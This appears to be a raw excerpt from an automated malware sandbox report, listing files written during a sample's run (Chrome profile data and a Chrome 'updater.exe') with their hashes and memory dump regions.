C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

memory/2956-519-0x0000015F3F8B0000-0x0000015F3F8C0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data15A8D\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\000001.dbtmp

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User Data15A8D\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 7d324d76c378db1467eba7d8eeacd61e
SHA1 d8773febcbc739413a81e34b0bc59feefdf69913
SHA256 534d0a42db9e4d138f7f491a3c9329c3fb49a2e32e8a030a8e2b4de50591945e
SHA512 0716cb8135385801f30ec3c0dfdfc8146cc860cb97ca623b21aca9f17a7d052703e3b6759aed355c79449a84c595c06ab6e03e510b64f985000d127baf9920a5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data15A8D\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe585484.TMP

MD5 52aa3e42eb93c0599fe994e8efb46e4f
SHA1 5e86f020ca1f4bbe2bfba507f8425544b6c86984
SHA256 0fec4f708800c15b092d045d81af0bbb80020d120199ca913f888be12f900186
SHA512 44f115f24bd6e3fe740c39a3d28847a529c02d95002c0d17b0646bc11ce818b261ab67b159b0205ad09b63e26895c0d5e35c0e8203dbf9da897044626b69bfb8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data15A8D\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 801c77c88a987ec3641f7fd48baf7612
SHA1 7ef52a3de565b97b8d874ec39d7dd1db0d63a366
SHA256 7b790836285673939da7b19591a84dcecf41a8caf5ead8b4e97c3fdccfa9872d
SHA512 4e6b6eee71dc88f37178dee2ca7febcf8539a9fa64fc2730949d71317cb44e5885182b610e43120e140052d2a49619a7a699709376fe802b3bfed5119a7bff12

memory/2956-560-0x0000015F3F8B0000-0x0000015F3F8C0000-memory.dmp

memory/2956-562-0x00007FFA2BDD0000-0x00007FFA2C891000-memory.dmp

memory/4776-565-0x00007FFA4BF30000-0x00007FFA4C125000-memory.dmp

memory/4776-566-0x00007FF611210000-0x00007FF612436000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 9e8a780a3a2e2caa61fc38a447d4f507
SHA1 0980fd961e246928ed9c563f414f847ced84aed7
SHA256 fdb5c70fc174a5952e18906bb5f1a4cddee2ab9a4fee01e3f2daa1eea4fad465
SHA512 01019e087bbd4ca02258bfc00b381ce33bf1c99abb1c3b73b01064586adb1fd2479382fe1fb077879c6a009a84f79a29073014444c4633e7d212b0ed631aca77

memory/3988-568-0x00007FF6FE210000-0x00007FF6FF436000-memory.dmp